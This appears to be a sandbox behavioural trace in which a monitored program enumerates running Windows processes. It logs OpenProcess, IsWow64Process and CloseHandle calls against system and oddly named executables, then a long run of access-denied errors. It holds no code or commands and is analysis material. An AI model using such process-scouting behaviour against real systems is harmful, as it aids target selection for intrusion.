	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.422] CloseHandle (hObject=0x224) returned 1
	[0071.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.422] CloseHandle (hObject=0x224) returned 1
	[0071.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.423] CloseHandle (hObject=0x224) returned 1
	[0071.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.423] CloseHandle (hObject=0x224) returned 1
	[0071.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.423] CloseHandle (hObject=0x224) returned 1
	[0071.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.423] CloseHandle (hObject=0x224) returned 1
	[0071.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.424] CloseHandle (hObject=0x224) returned 1
	[0071.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.424] CloseHandle (hObject=0x224) returned 1
	[0071.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.424] CloseHandle (hObject=0x224) returned 1
	[0071.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.424] CloseHandle (hObject=0x224) returned 1
	[0071.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.425] CloseHandle (hObject=0x224) returned 1
	[0071.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728998, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.425] CloseHandle (hObject=0x224) returned 1
	[0071.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.425] CloseHandle (hObject=0x224) returned 1
	[0071.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.426] CloseHandle (hObject=0x224) returned 1
	[0071.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.426] CloseHandle (hObject=0x224) returned 1
	[0071.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.426] CloseHandle (hObject=0x224) returned 1
	[0071.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.426] CloseHandle (hObject=0x224) returned 1
	[0071.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.426] CloseHandle (hObject=0x224) returned 1
	[0071.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.427] CloseHandle (hObject=0x224) returned 1
	[0071.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0071.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.427] CloseHandle (hObject=0x224) returned 1
	[0071.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.427] CloseHandle (hObject=0x224) returned 1
	[0071.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.427] CloseHandle (hObject=0x224) returned 1
	[0071.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.427] CloseHandle (hObject=0x224) returned 1
	[0071.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.428] CloseHandle (hObject=0x224) returned 1
	[0071.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.428] CloseHandle (hObject=0x224) returned 1
	[0071.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.428] CloseHandle (hObject=0x224) returned 1
	[0071.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.428] CloseHandle (hObject=0x224) returned 1
	[0071.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.428] CloseHandle (hObject=0x224) returned 1
	[0071.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.429] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.429] CloseHandle (hObject=0x224) returned 1
	[0071.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e810, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.429] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.429] CloseHandle (hObject=0x224) returned 1
	[0071.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e770, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.429] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.429] CloseHandle (hObject=0x224) returned 1
	[0071.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.429] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
	[0071.430] GetLastError () returned 0x5
